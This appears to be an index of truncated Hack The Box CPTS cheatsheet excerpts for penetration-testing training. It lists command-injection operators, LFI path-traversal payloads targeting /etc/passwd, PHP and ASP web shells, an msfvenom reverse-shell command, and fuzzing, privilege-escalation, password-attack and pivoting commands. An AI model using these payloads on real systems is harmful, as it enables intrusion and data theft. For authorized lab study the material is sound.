HTB CPTS Cheatsheet - Command Injection
Injection Operators Injection Operator Injection Character URL-Encoded Character Executed Command Semicolon ; %3b Both New Line \n %0a Both Background & %26 Both (second output generally shown first) Pipe | %7c Both (only second output is shown) AND && %26%26 Both (only if first succeeds) OR || %7c%7c Second (only if first fails) Sub-Shell `` %60%60 Both (Linux-only) Sub-Shell $() %24%28%29 Both (Linux-only) Linux Filtered Character Bypass Code Description ...
HTB CPTS Cheatsheet - Command Injection
Local File Inclusion Command Description Basic LFI /index.php?language=/etc/passwd Basic LFI /index.php?language=../../../../etc/passwd LFI with path traversal /index.php?language=/../../../etc/passwd LFI with name prefix /index.php?language=./languages/../../../../etc/passwd LFI with approved path LFI Bypasses /index.php?language=....//....//....//....//etc/passwd Bypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%6...
HTB CPTS Cheatsheet - File Upload Attacks
Web Shells Web Shell Description <?php file_get_contents('/etc/passwd'); ?> Basic PHP File Read <?php system('hostname'); ?> Basic PHP Command Execution <?php system($_REQUEST['cmd']); ?> Basic PHP Web Shell <% eval request('cmd') %> Basic ASP Web Shell msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php Generate PHP reverse shell PHP Web Shell PHP Web Shell PHP Reverse Shell PHP Reverse Shell...
HTB CPTS Cheatsheet - Footprinting
Infrastructure-based Enumeration Command Description curl -s https://crt.sh/\?q\=<target-domain>\&output\=json | jq . Certificate transparency. for i in $(cat ip-addresses.txt);do shodan host $i;done Scan each IP address in a list using Shodan. Host-based Enumeration FTP Command Description ftp <FQDN/IP> Interact with the FTP service on the target. nc -nv <FQDN/IP> 21 Interact with the FTP service on the target. telnet <FQDN/IP> 21 Interact with t...
HTB CPTS Cheatsheet - Fuzzing
Ffuf Command Description ffuf -h ffuf help ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ Sub-domain Fuzzing ffuf -w wordlis...
HTB CPTS Cheatsheet - Information Gathering
WHOIS Command Description export TARGET="domain.tld" Assign target to an environment variable. whois $TARGET WHOIS lookup for the target. DNS Enumeration Command Description nslookup $TARGET Identify the A record for the target domain. nslookup -query=A $TARGET Identify the A record for the target domain. dig $TARGET @<nameserver/IP> Identify the A record for the target domain. dig a $TARGET @<nameserver/IP> Identify the A record for the target domai...
HTB CPTS Cheatsheet - Linux Privilege Escalation
Command Description ssh htb-student@<target IP> SSH to lab target ps aux | grep root See processes running as root ps au See logged in users ls /home View user home directories ls -l ~/.ssh Check for SSH keys for current user history Check the current user’s Bash history sudo -l Can the user run anything as another user? ls -la /etc/cron.daily Check for daily Cron jobs lsblk Check for unmounted file systems/drives find / -path /proc -prune -o -type d -perm -...
HTB CPTS Cheatsheet - Metasploit
MSFconsole Commands Command Description show exploits Show all exploits within the Framework. show payloads Show all payloads within the Framework. show auxiliary Show all auxiliary modules within the Framework. search <name> Search for exploits or modules within the Framework. info Load information about a specific exploit or module. use <name> Load an exploit or module (example: use windows/smb/psexec). use <number> Load an exploit by using the i...
HTB CPTS Cheatsheet - Passwords Attack
Connecting to Target Command Description xfreerdp /v:<ip> /u:htb-student /p:HTB_@cademy_stdnt! CLI-based tool used to connect to a Windows target using the Remote Desktop Protocol. evil-winrm -i <ip> -u user -p password Uses Evil-WinRM to establish a PowerShell session with a target. ssh user@<ip> Uses SSH to connect to a target using a specified user. smbclient -U user \\\\<ip>\\SHARENAME Uses smbclient to connect to an SMB share using a specified user. p...
HTB CPTS Cheatsheet - Pivoting
Command Description ifconfig Linux-based command that displays all current network configurations of a system. ipconfig Windows-based command that displays all system network configurations. netstat -r Command used to display the routing table for all IPv4-based protocols. nmap -sT -p22,3306 <IPaddressofTarget> Nmap command used to scan a target for open ports allowing SSH or MySQL connections. ssh -L 1234:localhost:3306 Ubuntu@<IPaddressofTarget> SSH command used to ...





